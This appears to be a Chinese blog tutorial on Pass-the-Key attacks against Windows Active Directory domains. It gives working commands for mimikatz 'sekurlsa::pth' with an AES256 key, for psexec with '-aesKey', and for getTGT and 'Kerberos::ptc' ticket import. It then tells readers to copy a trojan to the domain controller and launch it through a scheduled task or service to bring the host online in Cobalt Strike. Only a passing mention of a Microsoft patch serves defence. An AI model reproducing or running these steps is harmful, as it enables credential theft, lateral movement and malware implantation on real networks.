大家好,欢迎来到IT知识分享网。
一. PTK密钥传递攻击原理
1. PTK介绍
2.PTK的原理-kerberos认证
3.AES KEY 到底是是什么
二. PTK的利用条件
根据上面原理的描述,那么进行PTK传递认证的条件有什么
必须是域环境,使用域账号才可以进行PTK 支持aes进行认证
1.KB补丁介绍
Microsoft发布了KB补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server2012也可以更新该补丁后获得上述安全保护机制。
https://blog.csdn.net/Ping_Pig/article/details/
2.PTK攻击
mimikatz进行传递
命令:sekurlsa::pth /user:用户名 /domain:域名或者IP /aes256:aeskey sekurlsa::pth /user:administrator /domain:DC.hack.com /aes256:e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c
抓包分析一下
这里出现的问题是因为使用mimikatz走的是NTLM挑战响应协议,这里需要换工具测试
psexec进行传递
命令:psexec.exe hack.com/ -aesKey e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c
抓包分析
这里可以看到走的是kerberos认证协议并且是用aes256
与多台机器进行传递攻击
三. 使用PTK进行上线CS
getTGT.exe hack.com/administrator -aesKey e7f05284c76ba55a21d1085d0b6fcc71be4c0e8b4164a8adc8c
Kerberos::ptc 票据名字
第三步:访问DC的C盘
接下来就是copy木马到DC上,再通过创建计划任务或者是服务运行木马使目标机上线!
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/139828.html